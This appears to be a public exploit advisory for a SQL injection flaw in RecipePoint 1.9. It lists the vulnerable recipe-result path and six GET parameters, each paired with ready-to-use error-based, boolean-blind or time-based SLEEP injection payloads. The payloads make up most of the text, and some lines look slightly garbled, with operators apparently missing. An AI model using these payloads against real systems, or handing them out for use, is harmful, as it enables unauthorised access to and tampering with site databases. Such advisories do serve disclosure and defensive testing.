Headline
RecipePoint 1.9 SQL Injection
RecipePoint version 1.9 suffers from a remote SQL injection vulnerability.
Exploit Title: RecipePoint 1.9 - SQL Injection
Exploit Author: CraCkEr
Date: 15/07/2023
Vendor: phpscriptpoint
Vendor Homepage: https://phpscriptpoint.com/
Software Link: https://demo.phpscriptpoint.com/recipepoint/
Tested on: Windows 10 Pro
Impact: Database Access
Description
SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company’s reputation.
Path: /recipepoint/recipe-result
GET parameter ‘text’ is vulnerable to SQL Injection
GET parameter ‘category’ is vulnerable to SQL Injection
GET parameter ‘type’ is vulnerable to SQL Injection
GET parameter ‘difficulty’ is vulnerable to SQL Injection
GET parameter ‘cuisine’ is vulnerable to SQL Injection
GET parameter ‘cooking_method’ is vulnerable to SQL Injection
https://website/recipepoint/recipe-result?text=[SQLI]&category=[SQLI]&type=[SQLI]&difficulty=[SQLI]&cuisine=[SQLI]&cooking_method=[SQLI]
Parameter: text (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: text=") AND (SELECT(0)FROM(SELECT COUNT(),CONCAT_WS(0x28,0x7e,0x72306f746833783439,FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: text=") OR NOT 07033=7033-- wXyW&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1
Parameter: category (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: text=&category=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&type=Free&difficulty=Beginner&cuisine=2&cooking_method=1
Parameter: type (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: text=&category=7&type=Free"XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR"Z&difficulty=Beginner&cuisine=2&cooking_method=1
Parameter: difficulty (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: text=&category=7&type=Free&difficulty=Beginner"XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR"Z&cuisine=2&cooking_method=1
Parameter: cuisine (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=(SELECT(0)FROM(SELECT(SLEEP(8)))a)&cooking_method=1
Parameter: cooking_method (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: text=&category=7&type=Free&difficulty=Beginner&cuisine=2&cooking_method=(SELECT(0)FROM(SELECT(SLEEP(5)))a)
[-] Done